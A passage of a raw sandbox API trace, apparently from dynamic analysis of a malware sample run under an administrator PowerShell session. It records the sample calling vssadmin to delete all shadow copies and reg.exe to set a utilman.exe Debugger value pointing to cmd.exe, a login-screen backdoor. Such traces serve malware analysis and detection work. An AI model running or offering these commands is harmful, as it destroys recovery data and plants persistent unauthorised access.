cFileName="vssadmin.exe", cAlternateFileName="")) returned 0 [0201.651] FindClose (in: hFindFile=0x2666a0 | out: hFindFile=0x2666a0) returned 1 [0201.651] SetErrorMode (uMode=0x1) returned 0x1 [0201.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\vssadmin.exe", nBufferLength=0x105, lpBuffer=0x1d18d960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\vssadmin.exe", lpFilePart=0x0) returned 0x20 [0201.652] SetErrorMode (uMode=0x1) returned 0x1 [0201.652] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.exe" (normalized: "c:\\windows\\system32\\vssadmin.exe"), fInfoLevelId=0x0, lpFileInformation=0x1d18db70 | out: lpFileInformation=0x1d18db70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2f501b5, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xd2f501b5, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0xfa124bf0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x28e00)) returned 1 [0201.654] SetErrorMode (uMode=0x1) returned 0x1 [0201.655] CoTaskMemAlloc (cb=0x22) returned 0x1b851e00 [0201.655] SHGetFileInfoA (in: pszPath="C:\\Windows\\system32\\vssadmin.exe", dwFileAttributes=0x0, psfi=0x1d18dd58, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1d18dd58) returned 0x4550 [0201.663] CoTaskMemFree (pv=0x1b851e00) [0201.663] GetConsoleWindow () returned 0x40270 [0201.665] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0201.665] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0201.665] CoTaskMemFree (pv=0x2e4780) [0201.667] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0201.667] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0201.667] CoTaskMemFree (pv=0x2e4780) [0201.667] CommandLineToArgvW (in: lpCmdLine=" Delete Shadows /All /Quiet", pNumArgs=0x1d18dda0 | out: pNumArgs=0x1d18dda0) returned 0x1b859c00*="" [0201.667] lstrlenW (lpString="Delete") returned 6 [0201.667] CoTaskMemAlloc (cb=0x10) returned 0x2749f0 [0201.667] RtlMoveMemory (in: Destination=0x2749f0, Source=0x1b859c32, Length=0xe | out: Destination=0x2749f0) [0201.667] CoTaskMemFree (pv=0x2749f0) [0201.667] lstrlenW (lpString="Shadows") returned 7 [0201.667] CoTaskMemAlloc (cb=0x12) returned 0x2749f0 [0201.667] RtlMoveMemory (in: Destination=0x2749f0, Source=0x1b859c40, Length=0x10 | out: Destination=0x2749f0) [0201.667] CoTaskMemFree (pv=0x2749f0) [0201.667] lstrlenW (lpString="/All") returned 4 [0201.667] CoTaskMemAlloc (cb=0xc) returned 0x2749f0 [0201.667] RtlMoveMemory (in: Destination=0x2749f0, Source=0x1b859c50, Length=0xa | out: Destination=0x2749f0) [0201.667] CoTaskMemFree (pv=0x2749f0) [0201.667] lstrlenW (lpString="/Quiet") returned 6 [0201.667] CoTaskMemAlloc (cb=0x10) returned 0x2749f0 [0201.667] RtlMoveMemory (in: Destination=0x2749f0, Source=0x1b859c5a, Length=0xe | out: Destination=0x2749f0) [0201.668] CoTaskMemFree (pv=0x2749f0) [0201.668] LocalFree (hMem=0x1b859c00) returned 0x0 [0201.668] CoTaskMemAlloc (cb=0x804) returned 0x1b863aa0 [0201.668] GetConsoleTitleW (in: lpConsoleTitle=0x1b863aa0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0201.670] CoTaskMemFree (pv=0x1b863aa0) [0201.670] CoTaskMemAlloc (cb=0x88) returned 0x263350 [0201.671] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\vssadmin.exe\" Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1d18dd00*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2fc1df8 | out: lpCommandLine="\"C:\\Windows\\system32\\vssadmin.exe\" Delete Shadows /All /Quiet", lpProcessInformation=0x2fc1df8*(hProcess=0x3cc, hThread=0x3a4, dwProcessId=0x3f8, dwThreadId=0x30c)) returned 1 [0201.693] CoTaskMemFree (pv=0x263350) [0201.693] CloseHandle (hObject=0x3a4) returned 1 [0201.694] CoTaskMemAlloc (cb=0x22) returned 0x1b851e00 [0201.694] SHGetFileInfoA (in: pszPath="C:\\Windows\\system32\\vssadmin.exe", dwFileAttributes=0x0, psfi=0x1d18dda8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1d18dda8) returned 0x4550 [0201.694] CoTaskMemFree (pv=0x1b851e00) [0201.695] GetCurrentProcess () returned 0xffffffffffffffff [0201.695] GetCurrentProcess () returned 0xffffffffffffffff [0201.695] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3cc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1d18de88, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1d18de88*=0x3a4) returned 1 [0202.261] CloseHandle (hObject=0x3a4) returned 1 [0202.261] GetExitCodeProcess (in: hProcess=0x3cc, lpExitCode=0x1d18def8 | out: lpExitCode=0x1d18def8*=0x1) returned 1 [0202.262] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0202.264] CloseHandle (hObject=0x3cc) returned 1 [0202.265] SetEvent (hEvent=0x1d8) returned 1 [0202.265] SetEvent (hEvent=0x2f0) returned 1 [0202.265] SetEvent (hEvent=0x1d4) returned 1 [0202.265] SetEvent (hEvent=0x1dc) returned 1 [0202.265] SetEvent (hEvent=0x3c0) returned 1 [0202.265] SetEvent (hEvent=0x37c) returned 1 [0202.265] SetEvent (hEvent=0x384) returned 1 [0202.265] SetEvent (hEvent=0x3bc) returned 1 [0202.265] SetEvent (hEvent=0x364) returned 1 [0202.266] CoUninitialize () Thread: id = 145 os_tid = 0x9bc [0202.300] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0202.302] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0202.303] VirtualQuery (in: lpAddress=0x1c83dc40, lpBuffer=0x1c83eb00, dwLength=0x30 | out: lpBuffer=0x1c83eb00*(BaseAddress=0x1c83d000, AllocationBase=0x1beb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x1000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0202.305] VirtualQuery (in: lpAddress=0x1c83def0, lpBuffer=0x1c83edb0, dwLength=0x30 | out: lpBuffer=0x1c83edb0*(BaseAddress=0x1c83d000, AllocationBase=0x1beb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0202.309] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0202.309] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.309] CoTaskMemFree (pv=0x2e4780) [0202.309] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0202.309] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.309] CoTaskMemFree (pv=0x2e4780) [0202.310] CoTaskMemAlloc (cb=0x20e) returned 0x2fcaf0 [0202.310] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2fcaf0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0202.310] CoTaskMemFree (pv=0x2fcaf0) [0202.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83dc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0202.310] SetErrorMode (uMode=0x1) returned 0x1 [0202.310] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\REG.ps1", lpFindFileData=0x1c83de20 | out: lpFindFileData=0x1c83de20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0202.311] SetErrorMode (uMode=0x1) returned 0x1 [0202.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83dc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0202.311] SetErrorMode (uMode=0x1) returned 0x1 [0202.311] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\REG.psm1", lpFindFileData=0x1c83de20 | out: lpFindFileData=0x1c83de20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0202.312] SetErrorMode (uMode=0x1) returned 0x1 [0202.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83dc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0202.312] SetErrorMode (uMode=0x1) returned 0x1 [0202.312] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\REG.psd1", lpFindFileData=0x1c83de20 | out: lpFindFileData=0x1c83de20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0202.312] SetErrorMode (uMode=0x1) returned 0x1 [0202.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83dc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0202.313] SetErrorMode (uMode=0x1) returned 0x1 [0202.313] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\REG.COM", lpFindFileData=0x1c83de20 | out: lpFindFileData=0x1c83de20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0202.313] SetErrorMode (uMode=0x1) returned 0x1 [0202.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83dc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0202.313] SetErrorMode (uMode=0x1) returned 0x1 [0202.314] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\REG.EXE", lpFindFileData=0x1c83de20 | out: lpFindFileData=0x1c83de20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x502c3bef, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0x502c3bef, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0xedd81bd0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x12400, dwReserved0=0x0, dwReserved1=0x0, cFileName="reg.exe", cAlternateFileName="")) returned 0x2666a0 [0202.314] FindNextFileW (in: hFindFile=0x2666a0, lpFindFileData=0x1c83de30 | out: lpFindFileData=0x1c83de30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x502c3bef, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0x502c3bef, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0xedd81bd0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x12400, dwReserved0=0x0, dwReserved1=0x0, cFileName="reg.exe", cAlternateFileName="")) returned 0 [0202.314] FindClose (in: hFindFile=0x2666a0 | out: hFindFile=0x2666a0) returned 1 [0202.314] SetErrorMode (uMode=0x1) returned 0x1 [0202.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\reg.exe", nBufferLength=0x105, lpBuffer=0x1c83df40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\reg.exe", lpFilePart=0x0) returned 0x1b [0202.315] SetErrorMode (uMode=0x1) returned 0x1 [0202.315] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\reg.exe" (normalized: "c:\\windows\\system32\\reg.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c83e150 | out: lpFileInformation=0x1c83e150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x502c3bef, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0x502c3bef, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0xedd81bd0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x12400)) returned 1 [0202.316] SetErrorMode (uMode=0x1) returned 0x1 [0202.317] CoTaskMemAlloc (cb=0x1d) returned 0x1b851e90 [0202.317] SHGetFileInfoA (in: pszPath="C:\\Windows\\system32\\reg.exe", dwFileAttributes=0x0, psfi=0x1c83e338, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c83e338) returned 0x4550 [0202.323] CoTaskMemFree (pv=0x1b851e90) [0202.323] GetConsoleWindow () returned 0x40270 [0202.324] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0202.324] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.324] CoTaskMemFree (pv=0x2e4780) [0202.324] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0202.324] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.324] CoTaskMemFree (pv=0x2e4780) [0202.324] CommandLineToArgvW (in: lpCmdLine=" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\" /f /v Debugger /t REG_SZ /d %windir%\\system32\\cmd.exe", pNumArgs=0x1c83e380 | out: pNumArgs=0x1c83e380) returned 0x3003b0*="" [0202.324] lstrlenW (lpString="ADD") returned 3 [0202.324] CoTaskMemAlloc (cb=0xa) returned 0x274810 [0202.324] RtlMoveMemory (in: Destination=0x274810, Source=0x30040a, Length=0x8 | out: Destination=0x274810) [0202.325] CoTaskMemFree (pv=0x274810) [0202.325] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 90 [0202.325] CoTaskMemAlloc (cb=0xb8) returned 0x2f15b0 [0202.325] RtlMoveMemory (in: Destination=0x2f15b0, Source=0x300412, Length=0xb6 | out: Destination=0x2f15b0) [0202.325] CoTaskMemFree (pv=0x2f15b0) [0202.325] lstrlenW (lpString="/f") returned 2 [0202.325] CoTaskMemAlloc (cb=0x8) returned 0x28f240 [0202.325] RtlMoveMemory (in: Destination=0x28f240, Source=0x3004c8, Length=0x6 | out: Destination=0x28f240) [0202.325] CoTaskMemFree (pv=0x28f240) [0202.325] lstrlenW (lpString="/v") returned 2 [0202.325] CoTaskMemAlloc (cb=0x8) returned 0x28f240 [0202.325] RtlMoveMemory (in: Destination=0x28f240, Source=0x3004ce, Length=0x6 | out: Destination=0x28f240) [0202.325] CoTaskMemFree (pv=0x28f240) [0202.325] lstrlenW (lpString="Debugger") returned 8 [0202.325] CoTaskMemAlloc (cb=0x14) returned 0x274810 [0202.325] RtlMoveMemory (in: Destination=0x274810, Source=0x3004d4, Length=0x12 | out: Destination=0x274810) [0202.325] CoTaskMemFree (pv=0x274810) [0202.325] lstrlenW (lpString="/t") returned 2 [0202.325] CoTaskMemAlloc (cb=0x8) returned 0x28f240 [0202.325] RtlMoveMemory (in: Destination=0x28f240, Source=0x3004e6, Length=0x6 | out: Destination=0x28f240) [0202.325] CoTaskMemFree (pv=0x28f240) [0202.325] lstrlenW (lpString="REG_SZ") returned 6 [0202.325] CoTaskMemAlloc (cb=0x10) returned 0x274810 [0202.325] RtlMoveMemory (in: Destination=0x274810, Source=0x3004ec, Length=0xe | out: Destination=0x274810) [0202.326] CoTaskMemFree (pv=0x274810) [0202.326] lstrlenW (lpString="/d") returned 2 [0202.326] CoTaskMemAlloc (cb=0x8) returned 0x28f240 [0202.326] RtlMoveMemory (in: Destination=0x28f240, Source=0x3004fa, Length=0x6 | out: Destination=0x28f240) [0202.326] CoTaskMemFree (pv=0x28f240) [0202.326] lstrlenW (lpString="%windir%\\system32\\cmd.exe") returned 25 [0202.326] CoTaskMemAlloc (cb=0x36) returned 0x1b85bb20 [0202.326] RtlMoveMemory (in: Destination=0x1b85bb20, Source=0x300500, Length=0x34 | out: Destination=0x1b85bb20) [0202.326] CoTaskMemFree (pv=0x1b85bb20) [0202.326] LocalFree (hMem=0x3003b0) returned 0x0 [0202.326] CoTaskMemAlloc (cb=0x804) returned 0x1b864550 [0202.326] GetConsoleTitleW (in: lpConsoleTitle=0x1b864550, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0202.327] CoTaskMemFree (pv=0x1b864550) [0202.327] CoTaskMemAlloc (cb=0x16e) returned 0x282bb0 [0202.327] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\reg.exe\" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\" /f /v Debugger /t REG_SZ /d %windir%\\system32\\cmd.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c83e2e0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2fdad40 | out: lpCommandLine="\"C:\\Windows\\system32\\reg.exe\" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\" /f /v Debugger /t REG_SZ /d %windir%\\system32\\cmd.exe", lpProcessInformation=0x2fdad40*(hProcess=0x41c, hThread=0x418, dwProcessId=0x6b8, dwThreadId=0x760)) returned 1 [0202.333] CoTaskMemFree (pv=0x282bb0) [0202.333] CloseHandle (hObject=0x418) returned 1 [0202.333] CoTaskMemAlloc (cb=0x1d) returned 0x1b851e90 [0202.333] SHGetFileInfoA (in: pszPath="C:\\Windows\\system32\\reg.exe", dwFileAttributes=0x0, psfi=0x1c83e388, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c83e388) returned 0x4550 [0202.334] CoTaskMemFree (pv=0x1b851e90) [0202.334] GetCurrentProcess () returned 0xffffffffffffffff [0202.334] GetCurrentProcess () returned 0xffffffffffffffff [0202.334] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x41c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c83e468, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c83e468*=0x418) returned 1 [0202.829] CloseHandle (hObject=0x418) returned 1 [0202.829] GetExitCodeProcess (in: hProcess=0x41c, lpExitCode=0x1c83e4d8 | out: lpExitCode=0x1c83e4d8*=0x0) returned 1 [0202.829] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0202.831] CloseHandle (hObject=0x41c) returned 1 [0202.831] SetEvent (hEvent=0x3e4) returned 1 [0202.831] SetEvent (hEvent=0x3d8) returned 1 [0202.831] SetEvent (hEvent=0x3dc) returned 1 [0202.831] SetEvent (hEvent=0x3e0) returned 1 [0202.831] SetEvent (hEvent=0x3f4) returned 1 [0202.832] SetEvent (hEvent=0x3e8) returned 1 [0202.832] SetEvent (hEvent=0x3ec) returned 1 [0202.832] SetEvent (hEvent=0x3f0) returned 1 [0202.832] SetEvent (hEvent=0x3f8) returned 1 [0202.832] CoUninitialize () Thread: id = 147 os_tid = 0x758 [0202.899] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0202.901] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0202.902] VirtualQuery (in: lpAddress=0x1c89d8e0, lpBuffer=0x1c89e7a0, dwLength=0x30 | out: lpBuffer=0x1c89e7a0*(BaseAddress=0x1c89d000, AllocationBase=0x1bf10000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0202.904] VirtualQuery (in: lpAddress=0x1c89db90, lpBuffer=0x1c89ea50, dwLength=0x30 | out: lpBuffer=0x1c89ea50*(BaseAddress=0x1c89d000, AllocationBase=0x1bf10000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0202.906] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0202.906] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.907] CoTaskMemFree (pv=0x2e4780) [0202.907] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0202.907] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.907] CoTaskMemFree (pv=0x2e4780) [0202.907] CoTaskMemAlloc (cb=0x20e) returned 0x2fae80 [0202.907] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2fae80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0202.907] CoTaskMemFree (pv=0x2fae80) [0202.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c89d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0202.908] SetErrorMode (uMode=0x1) returned 0x1 [0202.908] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\REG.ps1", lpFindFileData=0x1c89dac0 | out: lpFindFileData=0x1c89dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0202.908] SetErrorMode (uMode=0x1) returned 0x1 [0202.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c89d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0202.909] SetErrorMode (uMode=0x1) returned 0x1 [0202.909] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\REG.psm1", lpFindFileData=0x1c89dac0 | out: lpFindFileData=0x1c89dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0202.909] SetErrorMode (uMode=0x1) returned 0x1 [0202.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c89d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0202.909] SetErrorMode (uMode=0x1) returned 0x1 [0202.909] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\REG.psd1", lpFindFileData=0x1c89dac0 | out: lpFindFileData=0x1c89dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0202.909] SetErrorMode (uMode=0x1) returned 0x1 [0202.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c89d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0202.910] SetErrorMode (uMode=0x1) returned 0x1 [0202.910] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\REG.COM", lpFindFileData=0x1c89dac0 | out: lpFindFileData=0x1c89dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0202.910] SetErrorMode (uMode=0x1) returned 0x1 [0202.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c89d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0202.910] SetErrorMode (uMode=0x1) returned 0x1 [0202.910] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\REG.EXE", lpFindFileData=0x1c89dac0 | out: lpFindFileData=0x1c89dac0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x502c3bef, ftCreationTime.dwHighDateTime=0x1ca0411, 